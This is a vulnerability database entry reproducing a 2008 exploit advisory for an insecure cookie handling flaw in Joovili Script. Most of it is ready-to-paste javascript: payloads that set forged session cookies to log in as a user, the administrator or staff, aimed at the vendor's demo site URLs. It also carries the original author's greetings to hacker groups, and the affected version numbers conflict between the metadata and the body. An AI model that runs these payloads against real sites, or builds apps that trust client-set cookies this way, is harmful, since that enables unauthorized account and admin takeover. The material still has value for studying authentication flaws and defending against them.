Joovili Script Insecure Cookie Handling Vulnerability

vendor:

Script

by:

ZoRLu

7.5

CVSS

HIGH

Insecure Cookie Handling

613

CWE

Product Name: Script

Affected Version From: 3.1.2004

Affected Version To: 3.1.2004

Patch Exists: NO

Related CWE: N/A

CPE: joovili:script

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joovili Script Insecure Cookie Handling Vulnerability

Joovili Script version 3.1.4 is vulnerable to insecure cookie handling. An attacker can exploit this vulnerability by setting the session_id, session_logged_in, session_username, session_admin_id, session_admin_username, session_admin, session_staff_id, session_staff_username, and session_staff cookies to gain access to the application. For demo user, the attacker can set the session_id to 304, session_logged_in to true, and session_username to demo. For demo admin, the attacker can set the session_admin_id to 1, session_admin_username to admin, and session_admin to true. For demo staff, the attacker can set the session_staff_id to 3, session_staff_username to staff, and session_staff to true.

Mitigation:

Ensure that cookies are properly validated and sanitized before being used.

Source

Exploit-DB raw data:

[~] Joovili Script Insecure Cookie Handling Vulnerability
[~]
[~] version: 3.1.4 
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 02.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] 
[~] N0T: a.q kpss : ) )
[~]
[~] ----------------------------------------------------------

demo admin login:

http://demo.joovili.com/admin

demo user login:

http://demo.joovili.com/

demo staff login:

http://demo.joovili.com/staff/


exploit for user:

javascript:document.cookie = "session_id=real_id; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=real_user_name; path=/"; 


for demo user:

javascript:document.cookie = "session_id=304; path=/"; document.cookie = "session_logged_in=true; path=/"; document.cookie = "session_username=demo; path=/";

for demo admin:

javascript:document.cookie = "session_admin_id=1; path=/"; document.cookie = "session_admin_username=admin; path=/"; document.cookie = "session_admin=true; path=/";

for demo staff:

javascript:document.cookie = "session_staff_id=3; path=/"; document.cookie = "session_staff_username=staff; path=/"; document.cookie = "session_staff=true; path=/";

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-02]